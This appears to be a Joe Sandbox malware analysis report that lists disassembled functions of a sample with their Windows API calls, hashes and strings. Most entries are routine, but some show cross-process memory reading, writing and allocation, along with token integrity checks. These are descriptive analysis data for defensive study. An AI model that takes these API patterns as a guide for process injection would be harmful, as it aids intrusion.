Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 03058e5a0a6f63a287d8086d0674df53fdfba309254db58b9eace55944e515a5
Instruction ID: 1a09a16271cae136fac44509d051509c00c59dc7f4e8d50330bd00beba209623
Opcode Fuzzy Hash: 03058e5a0a6f63a287d8086d0674df53fdfba309254db58b9eace55944e515a5
Instruction Fuzzy Hash: 77219F75A00114AFDB10EF65D8C4BAEBBE9EF48310F14807DF90997362CA30AD41DB90

Function 00C612F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C6134D
SelectObject.GDI32(?,00000000), ref: 00C6135C
BeginPath.GDI32(?), ref: 00C61373
SelectObject.GDI32(?,00000000), ref: 00C6139C

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: c7daaa1a9cacc4fab182aee48038e872a84a86e58a2f0fe16f32dec1b67232e5
Instruction ID: d2f631ea4f03b4a8ce108c4cfc4c292477533d05035eb02a5d62228a5130cbdb
Opcode Fuzzy Hash: c7daaa1a9cacc4fab182aee48038e872a84a86e58a2f0fe16f32dec1b67232e5
Instruction Fuzzy Hash: AC213370800705EBDB319F25ED85B6DBBE4EB10322F5C4225F811D62B4D7B19952DF60

Function 00CBBC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00CBBCB3
_memcmp.LIBCMT ref: 00CBBCD1
_memcmp.LIBCMT ref: 00CBBCE4
_memcmp.LIBCMT ref: 00CBBCFC
_memcmp.LIBCMT ref: 00CBBD14

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 81e3b2f35a152bb6f261ee0812feaeb0bfe573b1f8b6ce5eaf7b8dccd2bbb0b0
Instruction ID: d7dbb6c407ed68e1f4c130921c674eb45c939740802de5fa3b7a463336d6e098
Opcode Fuzzy Hash: 81e3b2f35a152bb6f261ee0812feaeb0bfe573b1f8b6ce5eaf7b8dccd2bbb0b0
Instruction Fuzzy Hash: 5301B5716011197BE604AB169D42FFBB75CDE50388F084021FE1596346EB90EE1192E5

Function 00CC4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00CC4ABA
__beginthreadex.LIBCMT ref: 00CC4AD8
MessageBoxW.USER32(?,?,?,?), ref: 00CC4AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00CC4B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00CC4B0A

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 1249337f627fbce3ebb5c42367b8feb5fb09c60dae0704d6edfa959414f57eac
Instruction ID: 4c74262a00a605500b058c6d3b7aad8f047e0c5750e6abb8b1bc3d557bc4a1be
Opcode Fuzzy Hash: 1249337f627fbce3ebb5c42367b8feb5fb09c60dae0704d6edfa959414f57eac
Instruction Fuzzy Hash: 3E11E176904658FFCB159BA8EC58F9E7BACAB45320F14826DF824D3390D6718E0187A0

Function 00CB8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00CB821E
GetLastError.KERNEL32(?,00CB7CE2,?,?,?), ref: 00CB8228
GetProcessHeap.KERNEL32(00000008,?,?,00CB7CE2,?,?,?), ref: 00CB8237
HeapAlloc.KERNEL32(00000000,?,00CB7CE2,?,?,?), ref: 00CB823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00CB8255

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: d04bca6dab2da0132499d63fed203a535bc311dc1f7011a59195a7549f6cda94
Instruction ID: 2f9d23ef765fc9e7352a6987262c0d4412db716633e91781f40ad2c95cc832f6
Opcode Fuzzy Hash: d04bca6dab2da0132499d63fed203a535bc311dc1f7011a59195a7549f6cda94
Instruction Fuzzy Hash: 5F016971200249BFDB204FA6DC88EAF7BACEF8A754B50442DF859C6260DA318D05CA60

Function 00CB710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CB7044,80070057,?,?,?,00CB7455), ref: 00CB7127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CB7044,80070057,?,?), ref: 00CB7142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CB7044,80070057,?,?), ref: 00CB7150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CB7044,80070057,?), ref: 00CB7160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CB7044,80070057,?,?), ref: 00CB716C

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 808b9d18f3d46002714559ab021327ced5dcd32b242ce19f44163fc66fea26d2
Instruction ID: a78300105eb3281b4de9c48d437b5f4ebfdbacac2b7b79d599d69a3c13c76b03
Opcode Fuzzy Hash: 808b9d18f3d46002714559ab021327ced5dcd32b242ce19f44163fc66fea26d2
Instruction Fuzzy Hash: 0A0184B2601204BBDB114F68DC84BAE7BBDEF85751F144168FD08D6220D771DE4197A0

Function 00CC5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CC5260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00CC526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CC5276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00CC5280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CC52BC

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 88c30ed860a565e7f2d757a7786dced8f01852b3fe39d33622f754f106543512
Instruction ID: 70286b830a3f79b2ad2895c0849c415d6c0b456c2e1640d104c2b1dd892ad5c1
Opcode Fuzzy Hash: 88c30ed860a565e7f2d757a7786dced8f01852b3fe39d33622f754f106543512
Instruction Fuzzy Hash: E8011B31D01A1DDBDF00DFE5E889BEDBBB8BB09711F400159E945F6150CB30659187A1

Function 00CB810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00CB8121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00CB812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CB813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00CB8141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CB8157

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: c934915195d73f31248e80db5582507a6cda48ef939c19a1b0a3bca7134031e5
Instruction ID: 799ce752d8b59ee35ca461e06582e97bd8cb14481da05154ec46aa57d75455ee
Opcode Fuzzy Hash: c934915195d73f31248e80db5582507a6cda48ef939c19a1b0a3bca7134031e5
Instruction Fuzzy Hash: 3AF06871201344AFD7110F65DCC8FAF3BACFF85754F000029F545D6150CB619E46DA60

Function 00CBC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00CBC1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 00CBC20E
MessageBeep.USER32(00000000), ref: 00CBC226
KillTimer.USER32(?,0000040A), ref: 00CBC242
EndDialog.USER32(?,00000001), ref: 00CBC25C

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 1567f340e6219e277d3f1f2141415232d79325663429cfda5da43442a2f48694
Instruction ID: fc1ebef1da4885f4d6acd38b12007c8905c63d7de3f97f8d30b471a999308f7d
Opcode Fuzzy Hash: 1567f340e6219e277d3f1f2141415232d79325663429cfda5da43442a2f48694
Instruction Fuzzy Hash: 3701AD30404704ABEB205B60EDCEB9A77BCBB00B06F00066DB692A54E1DBF4AA459B91

Function 00C613B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00C613BF
StrokeAndFillPath.GDI32(?,?,00C9B888,00000000,?), ref: 00C613DB
SelectObject.GDI32(?,00000000), ref: 00C613EE
DeleteObject.GDI32 ref: 00C61401
StrokePath.GDI32(?), ref: 00C6141C

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 9e50e057171f874d75a48d23e9763dbef27aab66d69559399d7b50dcdb24d4a0
Instruction ID: 6d9ab0f9aa620ed265366092706354479bef2c4d570ea38afb9202c481686114
Opcode Fuzzy Hash: 9e50e057171f874d75a48d23e9763dbef27aab66d69559399d7b50dcdb24d4a0
Instruction Fuzzy Hash: FDF0CD30004748DBDB315F16EC8DB687BA4A711336F4C8229E969892F5C7714697DF60

Function 00C72CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00C80DB6: std::exception::exception.LIBCMT ref: 00C80DEC
Part of subcall function 00C80DB6: __CxxThrowException@8.LIBCMT ref: 00C80E01

Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22

Part of subcall function 00C67A51: _memmove.LIBCMT ref: 00C67AAB

__swprintf.LIBCMT ref: 00C72ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00C72D66

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 0e113577817186a437c98caa3a036d22629a3312b2397a05b533cdfdc51b17bc
Instruction ID: 576265a112668374d5b3fb028f031cd88ffec44a23119668580c9da7fe807c90
Opcode Fuzzy Hash: 0e113577817186a437c98caa3a036d22629a3312b2397a05b533cdfdc51b17bc
Instruction Fuzzy Hash: D4917D711082019FC724FF64D885C6FB7A8EF95714F14491DF8969B2A1EB30EE44EB62

Function 00CCB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00C64750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C64743,?,?,00C637AE,?), ref: 00C64770

CoInitialize.OLE32(00000000), ref: 00CCB9BB
CoCreateInstance.OLE32(00CF2D6C,00000000,00000001,00CF2BDC,?), ref: 00CCB9D4
CoUninitialize.OLE32 ref: 00CCB9F1

Part of subcall function 00C69837: __itow.LIBCMT ref: 00C69862
Part of subcall function 00C69837: __swprintf.LIBCMT ref: 00C698AC

Strings

.lnk, xrefs: 00CCB99D, 00CCB9AB

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 9e691ae255a17f02b09bc0dbe2b717211584c71c68edefe18bac9522b6a61bab
Instruction ID: e2c553790a8b1fa42f4c3e36132ad67a415d8428a2088953bf974b90e3941982
Opcode Fuzzy Hash: 9e691ae255a17f02b09bc0dbe2b717211584c71c68edefe18bac9522b6a61bab
Instruction Fuzzy Hash: 4EA153746042019FCB10DF54C895E6ABBE9FF89314F14899CF8A99B3A1CB31ED46CB91

Function 00C8501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00C850AD

Part of subcall function 00C900F0: __87except.LIBCMT ref: 00C9012B

Strings

pow, xrefs: 00C85085, 00C850A2

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 0aa854d86660574bcabbc838ea763e321df35773331edf28eb1941e6c0e60041
Instruction ID: 048297499a4b72934ed25185196213f9b6c8c17c8788385445c4c84f9bce74ef
Opcode Fuzzy Hash: 0aa854d86660574bcabbc838ea763e321df35773331edf28eb1941e6c0e60041
Instruction Fuzzy Hash: 88516E71A0CA029ADF117724C90937E2BD4AB41704F308D59E4F5862E9DF748FD4EB8A

Function 00C76192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C76248
_memmove.LIBCMT ref: 00C762E4
_memset.LIBCMT ref: 00C76308

Strings

ERCP, xrefs: 00C761B3

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 85de407b68972c67ba5f3250883cc863584da5284bbffca5f80a88cd162e19a3
Instruction ID: 6614114044dcf8fcb35e66d255f6bdf08da8d77e80b7256e1e80909e6f4d5df4
Opcode Fuzzy Hash: 85de407b68972c67ba5f3250883cc863584da5284bbffca5f80a88cd162e19a3
Instruction Fuzzy Hash: 8951AE70900B05DBDB24DFA5C885BEBBBE4EF04314F20856EE95ADB291E770AA44CB50

Function 00CB97F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00CC14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CB9296,?,?,00000034,00000800,?,00000034), ref: 00CC14E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00CB983F

Part of subcall function 00CC1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CB92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00CC14B1

Part of subcall function 00CC13DE: GetWindowThreadProcessId.USER32(?,?), ref: 00CC1409
Part of subcall function 00CC13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00CB925A,00000034,?,?,00001004,00000000,00000000), ref: 00CC1419
Part of subcall function 00CC13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00CB925A,00000034,?,?,00001004,00000000,00000000), ref: 00CC142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00CB98AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00CB98F9

Strings

@, xrefs: 00CB9911

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 4f2d1e51cd73cf3a39159d724f0458c650d0d8ad36e5fe1d3cf3b5bb865094e4
Instruction ID: 4eb0a4731e7013a290ed79d3407b2cb27dffb1e6d849fc1fe54f0f176f4147a0
Opcode Fuzzy Hash: 4f2d1e51cd73cf3a39159d724f0458c650d0d8ad36e5fe1d3cf3b5bb865094e4
Instruction Fuzzy Hash: 26413976900218AFDB10DFA4CC85FDEBBB8EB0A300F044099FA55A7191DA716F45DBA0

Function 00CE7946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00CEF910,00000000,?,?,?,?), ref: 00CE79DF
GetWindowLongW.USER32 ref: 00CE79FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CE7A0C

Strings

SysTreeView32, xrefs: 00CE79B1

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: c4984bc157b943260756d534a46bc03c7151049b1f01ff287d6ec87f36a48c22
Instruction ID: a2a11e055cef7159e46aea6587440ced4507de9698d6262dd6798f8c2f429d73
Opcode Fuzzy Hash: c4984bc157b943260756d534a46bc03c7151049b1f01ff287d6ec87f36a48c22
Instruction Fuzzy Hash: E431EF32204646AFDB218F39DC41BEA77A9EF05324F244725F875A32E1D731EE519B60

Function 00CE73D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00CE7461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00CE7475
SendMessageW.USER32(?,00001002,00000000,?), ref: 00CE7499

Strings

SysMonthCal32, xrefs: 00CE742C

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: bfa33d0ebbd0693ce691a179a59f6fcb86b151309f177bd581efb7b918cb573d
Instruction ID: 71907cf13d8db9acf5d4ad1bb0d523d76661177700fa7017599cf99001cdb2c7
Opcode Fuzzy Hash: bfa33d0ebbd0693ce691a179a59f6fcb86b151309f177bd581efb7b918cb573d
